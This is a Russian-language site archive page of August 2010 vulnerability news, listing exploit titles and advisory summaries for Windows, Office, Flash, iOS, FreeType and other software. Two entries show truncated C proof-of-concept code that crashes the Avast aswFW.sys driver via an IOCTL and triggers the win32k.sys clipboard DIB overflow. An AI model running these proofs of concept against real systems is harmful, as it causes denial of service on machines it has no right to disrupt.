Меню сайта |
|
|
Разделы новостей |
|
|
Наш опрос |
|
|
|
Главная » Архив материалов
Добавил эксплоиты на следущие программы: MS Windows win32k.sys Heap Overflow PoC
Цель: Microsoft Windows XP, 2003, Vista, 2008, 7 Воздействие: Отказ в обслуживании 07 августа, 2010 (просмотров: 869 ) Avast! Internet Security 5.0 aswFW.sys kernel driver IOCTL Memory Pool Corruption PoC
Цель: Avast! Internet Security 5.0 Воздействие: Отказ в обслуживании 06 августа, 2010 (просмотров: 411 ) Xerver 4.32 Source Disclosure and HTTP Authentication Bypass Exploit (Meta)
Цель: Xerver 4.32 Воздействие: Раскрытие данных 02 августа, 2010 (просмотров: 462 ) Barcodewiz 3.29 Barcode ActiveX Control Remote Heap Spray Exploit (IE6/IE7)
Цель: Barcodewiz 3.29 Воздействие: Выполнение произвольного кода 01 августа, 2010 (просмотров: 495 ) Xion Audio Player 1.0.125 Denial of Service PoC
Цель: Xion Audio Player 1.0.125 Воздействие: Отказ в обслуживании 01 августа, 2010 (просмотров: 422 ) Xmyplay 3.5.1 Denial Of Service
...
Читать дальше »
Категория: Уязвимости |
Просмотров: 966 |
Добавил: Sgw32 |
Дата: 11.08.2010
|
|
Цель:
Avast! Internet Security 5.0
Воздействие: Отказ в обслуживании Целочисленное переполнение обнаружено в драйвере устройства aswFW.sys.
Локальный пользователь может с помощью специально сформированного
0x829C0964 IOCTL запроса вызвать повреждение памяти и аварийно завершить
работу приложения.
#include "stdafx.h"
#include "windows.h"
#include "winioctl.h"
#include "stdio.h"
int main(void)
{
HANDLE hFile = NULL;
ULONG ioctl_code = 0;
CHAR outBuf[32];
CHAR rpt_inBuf[102400];
DWORD dwRet = 0, ret = 0;
hFile = CreateFile("\\\\.\\aswFW", FILE_SHARE_READ |
F
...
Читать дальше »
Категория: Уязвимости |
Просмотров: 684 |
Добавил: Sgw32 |
Дата: 11.08.2010
|
|
11 августа, 2010
Программа:
Microsoft Office XP
Microsoft Office 2003
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Open XML File Format Converter for Mac
Опасность: Высокая
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код
на целевой системе.
Уязвимость существует из-за недостаточной обработки PivotTable Cache
Data записей в .xls файлах. Удаленный пользователь может с помощью
специально сформированного .xls файла вызвать переполнение стека и
выполнить произвольный код на целевой системе.
URL производителя:
www.microsoft.com
Решение: Установите исправление с сайта
производит
...
Читать дальше »
Категория: Уязвимости |
Просмотров: 790 |
Добавил: Sgw32 |
Дата: 11.08.2010
|
|
11 августа, 2010
Программа:
Microsoft .NET Framework 2.0, 3.5, 3.5.1
Microsoft Silverlight версии 2 и 3
Опасность: Высокая
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код
на целевой системе.
Уязвимость существует в .NET Framework при обработке делегирований
виртуальных методов с помощью CLR (Common Language Runtime). Удаленный
пользователь может с помощью специально сформированного .NET или
Silverlight приложения выполнить произвольный код на целевой системе.
URL производителя:
www.microsoft.com
Решение: Установите исправление с сайта
производителя.
Microsoft .NET Framework
...
Читать дальше »
Категория: Уязвимости |
Просмотров: 647 |
Добавил: Sgw32 |
Дата: 11.08.2010
|
|
11 августа, 2010
Программа:
Adobe Flash Player 10.1.53.64 и более ранние версии
Adobe AIR 2.0.2.12610 и более ранние версии
Опасность: Высокая
Наличие эксплоита: Нет
Описание:
Обнаруженные уязвимости позволяют удаленному пользователю
скомпрометировать целевую систему.
1. Уязвимость существует из-за ошибки в ActionScript Virtual Machine 1
(AVM1) при обработке команды "ActionPush". Удаленный пользователь может
вызвать повреждение памяти и выполнить произвольный код на целевой
системе.
2. Уязвимость существует из-за неизвестной ошибки. Удаленный
пользователь может вызвать повреждение памяти и выполнить произвольный
код на целевой системе.
3. Уязвимость существует из-за неизвестной ошибки. Удаленный
пользователь м
...
Читать дальше »
Категория: Уязвимости |
Просмотров: 810 |
Добавил: Sgw32 |
Дата: 11.08.2010
|
|
Эксплоит на C, эксплуатирует отказ в обслуживании в драйвере
win32k.sys DEVMODE dm = {0};
dm.dmSize = sizeof(DEVMODE);
dm.dmBitsPerPel = 8;
dm.dmPelsWidth = 800;
dm.dmPelsHeight = 600;
dm.dmFields = DM_PELSWIDTH | DM_PELSHEIGHT | DM_BITSPERPEL;
ChangeDisplaySettings(&dm, 0);
BITMAPINFOHEADER bmih = {0};
bmih.biClrUsed = 0×200;
HGLOBAL h = GlobalAlloc(GMEM_FIXED, 0×1000);
memcpy((PVOID)GlobalLock(h), &bmih, sizeof(bmih));
GlobalUnlock(h);
OpenClipboard(NULL);
SetClipboardData(CF_DIBV5, (HANDLE)h);
CloseClipboard();
...
Читать дальше »
Категория: Уязвимости |
Просмотров: 1131 |
Добавил: Sgw32 |
Дата: 09.08.2010
|
|
07 августа, 2010
Программа:
Microsoft Windows
XP
Microsoft Windows 2003
Microsoft Windows Vista
Microsoft Windows 2008
Microsoft Windows 7
Опасность: Низкая
Наличие эксплоита: Да
Описание:
Уязвимость позволяет локальному пользователю повысить свои привилегии на
системе.
Уязвимость существует из-за ошибки проверки границ данных в функции
CreateDIBPalette() в драйвере win32k.sys при копировании значений цветов
в фиксированный буфер во время создания DIB палитры. Локальный
пользователь может вызвать переполнение буфера через GetClipboardData()
API, указав слишком большое количество цветов (более 256) через поле
"biClrUsed" в структуре BITMAPINFOHEADE
...
Читать дальше »
Категория: Уязвимости |
Просмотров: 963 |
Добавил: Sgw32 |
Дата: 09.08.2010
|
|
06 августа, 2010
Программа: OpenOffice.org 3.2.1 для
Windows,
возможно другие версии.
Опасность: Высокая
Наличие эксплоита: Нет
Описание:
Обнаруженные уязвимости позволяют удаленному пользователю выполнить
произвольный код на целевой системе.
1. Уязвимость существует из-за ошибки усечения целочисленных при
обработке определенных данных. Удаленный пользователь может с помощью
специально сформированного файла вызвать переполнение динамической
памяти и выполнить произвольный код на целевой системе.
2. Уязвимость существует из-за целочисленного переполнения при обработке
некоторых данных. Удаленный пользователь может с помощью специально
сформированного файла вызвать переполнение динамической памяти и
выполнить произвольный код на це
...
Читать дальше »
Категория: Уязвимости |
Просмотров: 625 |
Добавил: Sgw32 |
Дата: 09.08.2010
|
|
06 августа, 2010
Программа: Apple IPhone OS (iOS)
4.0.1, возможно другие версии.
Опасность: Высокая
Наличие эксплоита: Нет
Описание:
Обнаруженные уязвимости позволяют злоумышленнику повысить свои
привилегии и выполнить произвольный код на устройстве.
1. Уязвимость существует из-за неизвестной ошибки в ядре, которая
позволяет локальному пользователю повысить свои привилегии.
2. Уязвимость существует из-за ошибки при обработке определенных опкодов
в CFF (Compact Font Format) шрифте, встроенном, например, в PDF файл.
Удаленный пользователь может с помощью специально сформированного PDF
файла вызвать повреждение памяти и выполнить произвольный код на целевой
системе.
Примечание: уязвимости используются в настоящее время дл
...
Читать дальше »
Категория: Уязвимости |
Просмотров: 589 |
Добавил: Sgw32 |
Дата: 09.08.2010
|
|
Множественные
уязвимости в FreeType
09 августа, 2010
Программа: FreeType 2.4.2, возможно
другие версии.
Опасность: Высокая
Наличие эксплоита: Нет
Описание:
Обнаруженные уязвимости позволяют удаленному пользователю выполнить
произвольный код на целевой системе.
1. Уязвимость существует из-за ошибок при обработке опкодов в Compact
Font Format (CFF) шрифтах. Удаленный пользователь может с помощью
специально сформированного CFF шрифта вызвать переполнение стека и
выполнить произвольный код на целевой системе. Уязвимость относится к:
www.securitylab.ru/vulnerability/396494.php
2. Уязвимость существует из-за ошибки проверки границ данных в функции
Mac_Read_POST_Resou
...
Читать дальше »
Категория: Уязвимости |
Просмотров: 665 |
Добавил: Sgw32 |
Дата: 09.08.2010
|
|
« 1 2 3 4 5 6 ... 14 15 » |
|
Форма входа |
|
|
Календарь новостей |
« Март 2024 » | Пн | Вт | Ср | Чт | Пт | Сб | Вс | | | | | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 |
|
|
Поиск |
|
|
Друзья сайта |
Limit Calculator
|
|
Статистика |
|
|
|